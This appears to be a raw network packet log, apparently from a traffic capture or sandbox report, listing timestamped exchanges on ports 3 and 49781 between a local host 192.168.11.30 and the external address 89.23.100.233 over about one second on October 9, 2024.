Oct 9, 2024 16:30:19.671802998 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.671812057 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.671823978 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.671832085 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.671839952 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.671951056 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.672022104 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.672070026 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.672077894 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.672086954 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.672290087 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.672322989 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.672332048 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.672460079 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.672678947 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.672730923 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.672847033 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.673029900 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.673038960 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.673116922 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.673125982 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.673408985 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.902328014 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.902518034 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.902534008 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.902678967 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.902750969 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.902898073 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.903398991 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.903409958 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.903418064 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.903527975 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.903537035 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.903750896 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.904405117 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.904620886 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.904793024 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.904819012 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.905025005 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.905198097 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.905355930 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.905525923 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.905694962 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.905864000 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.906008959 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.911256075 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.911600113 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.911735058 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.923636913 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:19.923819065 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:19.923990011 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.141103029 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.141283035 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.141453981 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.146122932 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.146131992 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.146140099 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.146147966 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.146157980 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.146243095 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.146387100 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.146492958 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.146502018 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.146502972 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.146527052 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.146575928 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.146682978 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.146748066 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.146920919 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.147090912 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.147169113 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.147181034 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.147190094 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.147197962 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.147258997 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.147279978 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.147289991 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.147463083 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.147463083 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.147507906 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.147516966 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.147618055 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.147633076 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.147764921 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.147941113 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.148273945 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.148284912 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.148293972 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.148309946 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.148319960 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.148329020 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.148336887 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.148346901 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.148530960 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.148540020 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.148618937 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.148655891 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.148679972 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.148745060 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.148917913 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.149153948 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.149162054 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.149169922 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.149430990 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.150639057 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.150648117 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.150742054 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.150990009 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.150990009 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.162904024 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.163028955 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.163038015 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.163134098 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.163141966 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.163150072 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.163158894 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.163254023 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.163254023 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.163403034 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.163521051 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.163569927 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.380338907 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.380352020 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.380378962 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.380721092 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.385132074 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.385173082 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.385294914 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.385303974 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.385312080 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.385312080 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.385482073 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.385597944 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.385607958 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.385732889 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.385901928 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.386492014 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.386501074 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.386509895 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.386518002 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.386538982 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.386548042 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.386555910 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.386570930 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.386703968 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.386743069 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.386845112 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.386913061 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.387059927 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.387072086 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.387080908 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.387231112 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.387315989 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.387326002 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.387334108 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.387341976 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.387350082 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.387357950 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.387605906 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.387644053 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.387773037 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.387790918 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.387798071 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.387984037 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.388108015 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.388130903 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.388299942 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.388334036 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.388343096 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.388350010 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.388556004 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.388714075 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.388830900 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.388884068 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.388997078 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.389178038 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.389291048 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.389413118 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.389911890 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.389928102 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.390203953 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.390213013 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.390264034 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.390315056 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.390324116 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.390520096 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.390532970 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.390749931 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.390981913 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.390990973 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.390999079 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.391078949 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.391211033 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.391331911 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.391416073 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.391433954 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.391793966 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.391803026 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.392146111 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.402534008 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.402543068 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.402740002 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.402889967 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.402932882 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.403109074 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.403279066 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.403480053 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.619048119 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.619317055 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.619472980 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.623517990 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.623796940 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.623965979 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.624006987 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.624124050 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.624201059 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.624269009 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.624368906 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.624614000 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.624835014 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.625067949 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.625118971 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.625189066 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.625283003 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.625303984 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.625349045 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.625475883 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.625654936 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.625669003 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.625984907 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.625986099 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.625994921 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.626157045 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.626287937 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.626401901 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.626665115 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.626861095 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.627042055 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.627449036 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.627660036 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.628849983 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.628859043 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.628963947 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.629064083 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.629200935 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.629249096 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.629463911 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.629712105 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.629731894 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.629909992 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.630079985 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.630196095 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.630400896 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.630568981 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.641104937 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.641115904 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.641170025 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.641294003 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.641493082 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.641514063 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.641774893 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.641850948 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.641983032 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.642021894 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.642151117 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.642344952 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.642376900 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.642529964 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.642622948 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.642683983 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.642755032 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.642764091 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.642771959 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.642869949 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.643069029 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.643074989 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.643255949 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.643415928 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.858084917 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.858345985 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.858489990 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.862005949 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.862133980 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.862212896 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.862386942 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.862394094 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.862432957 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.862576008 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.862715960 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.862936020 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.863105059 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.863231897 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.863413095 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.863447905 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.863584042 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.863694906 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.864008904 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.864017963 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.864203930 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.864224911 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.864233971 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.864361048 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.864408016 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.864478111 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.864609957 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.864748001 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.864953995 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.865148067 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.865156889 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.865257978 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.865449905 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.865616083 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.865834951 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.866003036 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.866110086 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.866288900 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.866458893 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.867167950 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.867312908 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.867397070 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.867465973 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.867532969 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.867719889 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.867728949 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.867768049 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.868091106 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.868122101 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.868263006 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.868431091 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.868633032 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.868772030 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.879667997 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.879900932 CEST	49781	3	192.168.11.30	89.23.100.233
